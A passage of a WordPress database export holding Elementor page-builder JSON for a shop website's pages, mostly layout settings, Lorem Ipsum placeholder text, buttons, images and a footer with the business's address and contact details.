Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"39999ab\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lorem Ipsum<\\/strong>\\u00a0is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.<\\/p>\",\"align\":\"center\",\"text_color\":\"#174725\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"30\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"eaa49a3\",\"elType\":\"widget\",\"settings\":{\"text\":\"Know More\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"center\",\"background_color\":\"#FF8236\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c3a23a2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"22d1461\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"b0a2b03\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"27202c7\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"background_background\":\"classic\",\"background_color\":\"#F0F0F0\"},\"elements\":[{\"id\":\"3c307c5\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"d2c5d23\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"4cc038b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f7f100a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"f270d26\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"802fcc9\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false},{\"id\":\"53f4aeb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"f85352a\",\"elType\":\"widget\",\"settings\":{\"testimonial_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"testimonial_name\":\"John Doe\",\"testimonial_job\":\"Designer\",\"_background_background\":\"classic\",\"_background_color\":\"#BDD6BD8F\"},\"elements\":[],\"widgetType\":\"testimonial\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"204ce8a\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef00601\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"0d3e7a9\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"5d24ace\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"00\",\"right\":\"100\",\"bottom\":\"80\",\"left\":\"100\",\"isLinked\":false},\"background_position\":\"initial\",\"background_ypos\":{\"unit\":\"px\",\"size\":-220,\"sizes\":[]}},\"elements\":[{\"id\":\"eb82b0e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"90\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7af9c58\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"header_size\":\"h1\",\"align\":\"center\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"73daaad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4><strong>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/strong><\\/h4>\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6345fb6\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"center\",\"background_color\":\"#FFAA00\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" B-55, NGEF Industrial Ancillary Estate, <br>Mahadevapura, Bangalore 560048<br>\\nContact : (+91)7259272171<br>\\nE-mail id: mango@homedirect.in\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(8856,1524,'_elementor_page_assets','a:0:{}'),(8858,1525,'_elementor_edit_mode','builder'),(8859,1525,'_elementor_template_type','wp-page'),(8860,1525,'_elementor_version','3.7.8'),(8861,1525,'_wp_page_template','elementor_canvas'),(8862,1525,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"50\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"150\",\"height\":\"150\"},\"link_to\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":58.631999999999998},\"elements\":[],\"isInner\":false},{\"id\":\"1609351\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":5.2939999999999996},\"elements\":[{\"id\":\"39fe47a\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/home\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":3.1619999999999999},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":20,\"_inline_size\":12.894},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#006505\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1fbbc13\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\",\"id\":1355,\"alt\":\"\",\"source\":\"library\"},\"background_size\":\"cover\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"77\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"945df22\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"104\",\"isLinked\":false}},\"elements\":[{\"id\":\"5a1c0c9\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"26b984b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":89.680999999999997,\"background_background\":\"classic\",\"background_color\":\"#0000007D\",\"margin\":{\"unit\":\"px\",\"top\":\"187\",\"right\":\"0\",\"bottom\":\"-40\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"979ed75\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"title_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"4b78a11\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\",\"text_color\":\"#FFFFFF\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"970607c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#F78A00\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":true},{\"id\":\"3ed0437\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":10.272},\"elements\":[],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"623a672\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"30\"},\"elements\":[{\"id\":\"739cf25\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[{\"id\":\"d837b3b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#3AB2A7\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"4cb627c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"background_background\":\"classic\"},\"elements\":[{\"id\":\"fafaf1c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#092220\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false},{\"id\":\"5913281\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f899190\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"1536x1536\",\"thumbnail_custom_dimension\":{\"width\":\"1200\",\"height\":\"800\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"text_align\":\"center\",\"title_bottom_space\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#2EB7BC\"},\"elements\":[],\"widgetType\":\"image-box\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f16dea3\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"cc1fd22\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"f37b36f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fa36b21\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo<\\/p><p>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"aa95f02\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"background_color\":\"#FF6E00\",\"_margin\":{\"unit\":\"px\",\"top\":\"-24\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"374288e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30868ff\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\",\"id\":1354,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"_margin\":{\"unit\":\"px\",\"top\":\"19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"da958fb\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#DDD6D636\"},\"elements\":[{\"id\":\"708fcb4\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"52f19eb\",\"elType\":\"widget\",\"settings\":{\"tabs\":[{\"tab_title\":\"Accordion #1\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c1c0cb1\"},{\"tab_title\":\"Accordion #2\",\"tab_content\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\",\"_id\":\"c81da6b\"},{\"_id\":\"de1d949\",\"tab_title\":\"Accordion Title\"},{\"_id\":\"cb17b05\",\"tab_title\":\"Accordion Title\"}],\"selected_icon\":{\"value\":\"\",\"library\":\"\"},\"faq_schema\":\"yes\",\"border_width\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_element_width\":\"inherit\",\"_animation\":\"none\"},\"elements\":[],\"widgetType\":\"accordion\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e357abe\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"b3b6eb2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ae4d7ac\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"20a83dc\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\",\"align\":\"center\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bc85492\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a53f4e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"88d8734\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"006d2d2\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"fb06b27\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6df56a4\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"3427821\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"981ddd1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"769b005\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"ef95559\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"4c2bf26\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"550a2fe\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"d29feb9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"c8fdf6d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a5bf1ad\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"9453712\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"e15dab4\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"6c1b003\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"71c81df\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f37c86d\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"f839c1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0d6b040\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e374c42\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"27bc579\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"e6bf144\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"4958df1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"48ae73c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4fbe7c9\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7f118ef\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"1094c04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"23f1949\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"button_text_color\":\"#020202\",\"background_color\":\"#B8BFB900\"},\"elements\":[],\"widgetType\":\"button\"},{\"id\":\"564a60c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false},{\"id\":\"4f7aa47\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6b7196e\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"db3e45f\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"background_background\":\"classic\",\"background_color\":\"#B8BFB959\"},\"elements\":[{\"id\":\"c6757ae\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\",\"id\":1357,\"alt\":\"\",\"source\":\"library\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"f80f2bc\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click 